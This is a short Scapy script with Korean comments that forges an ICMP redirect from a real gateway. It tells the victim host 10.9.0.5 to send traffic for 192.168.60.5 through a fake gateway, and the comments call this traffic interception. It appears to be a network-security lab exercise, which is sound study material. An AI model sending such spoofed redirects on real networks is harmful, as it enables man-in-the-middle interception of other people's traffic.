
# 목표
victim = "10.9.0.5"
# 실제 게이트 웨이 주소
real_gateway = "10.9.0.11"
# 가짜 게이트 웨이 주소
fake_gateway = "10.9.0.111"

# 리다이레트 대상이 되는 IP 패킷 생성
# 이 패킷은 목표(victim) 에게서 오는 트래픽을 
# 실제 게이트웨이에서 오는 것 처럼 속이려고 하는 것
ip = IP(src = real_gateway , dst=victim)

# ICMP 리다이렉트 메시지를 생성
# code=1 은 호스트에 대한 리다이렉트를 나타낸다.
icmp = ICMP(type=5, code=1)

# 리다이렉트 메시지에 가짜 게이트웨이 주소를 설정핸다.
# 즉 목표가 가짜 게이트웨이로 리다이렉트하게끔 한다.
icmp.gw = fake_gateway

# 원래 목적지로 보내질 IP 패킷 생성
# 여기서는 목표가 192.168.60.5 로 가는 패킷
ip2 = IP(src=victim, dst="192.168.60.5")

# 두 개의 패킷을 조합하여 전송
# 첫 번째 패킷은 목표(victim)에게 리다이렉트 메시지를 보내도록 하고,
# 두 번째 패킷은 원래 목적지로 가도록 한다.

send(ip/icmp/ip2/ICMP())

# 결국 공격자가 피해자의 트래픽을 가로채어 가짜 게이트웨이로 리다이렉트 하는 공격이다.
